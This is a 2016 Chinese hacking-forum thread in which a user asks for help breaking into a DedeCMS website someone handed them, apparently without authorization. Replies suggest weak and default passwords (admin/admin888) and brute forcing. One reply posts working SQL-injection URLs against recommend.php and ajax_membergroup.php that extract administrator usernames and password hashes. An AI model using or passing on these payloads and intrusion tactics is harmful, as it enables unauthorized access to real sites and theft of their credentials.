求助dedecms

yer兮 · 发表于 2016-8-15 19:46:45

饿，事情是这样的，今天看了一个站点，别人丢给了我，让我拿，我试了很多办法都不行，当然最后更新日志20140814 试了很多exp不好使，

旁站没有没思路，看人家轻松拿下，好失望啊，

弱口令不行， burp不行，唉

w2015 · 发表于 2016-8-15 23:16:52

是不是远程写文件哦！1408的好像exp都不行!可能存在备份，或者错误文件泄露了密码！

yer兮 · 发表于 2016-8-16 10:59:00

w2015 发表于 2016-8-15 23:16
是不是远程写文件哦！1408的好像exp都不行!可能存在备份，或者错误文件泄露了密码！ ...

那我要从哪里开始呢

w2015 · 发表于 2016-8-16 13:15:10

yer兮发表于 2016-8-16 10:59
那我要从哪里开始呢

既然人家很容易就拿下了，或许你可以多试试弱口令。同时可以试试万能密码这个不错的选择。

yer兮 · 发表于 2016-8-16 13:36:17

w2015 发表于 2016-8-16 13:15
既然人家很容易就拿下了，或许你可以多试试弱口令。同时可以试试万能密码这个不错的选择。 ...

我去dede有弱口令？

w2015 · 发表于 2016-8-16 16:26:05

yer兮发表于 2016-8-16 13:36
我去dede有弱口令？

你认为呢？

yer兮 · 发表于 2016-8-17 16:42:29

w2015 发表于 2016-8-16 16:26
你认为呢？

弱口令试了拿不下

用我字典burp下也不行

sladjfksld · 发表于 2016-8-17 17:32:40

这个版本，已公布的漏洞可以试试远程写入exp和会员中心的注入（前提是网站开启会员功能）

481326635 · 发表于 2016-8-18 17:59:56

[SQL] 纯文本查看 复制代码

“/data/admin/ver.txt”页面获取系统最后升级时间，


/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'  or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878


访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，存在页面代表有漏洞

查看管理员帐号

/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

查看管理员密码 
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

这几个是网上公开的，可以试试弱口令 admin admin888 之类的

yer兮 · 发表于 2016-8-18 19:05:40

481326635 发表于 2016-8-18 17:59
[mw_shl_code=sql,true]“/data/admin/ver.txt”页面获取系统最后升级时间，

谢谢

嘿嘿

求助dedecms

相关帖子

点评

RE: 求助dedecms

点评

RE: 求助dedecms

点评

RE: 求助dedecms

点评

RE: 求助dedecms

点评

RE: 求助dedecms

点评

RE: 求助dedecms

指导单位

旗下站点

联系我们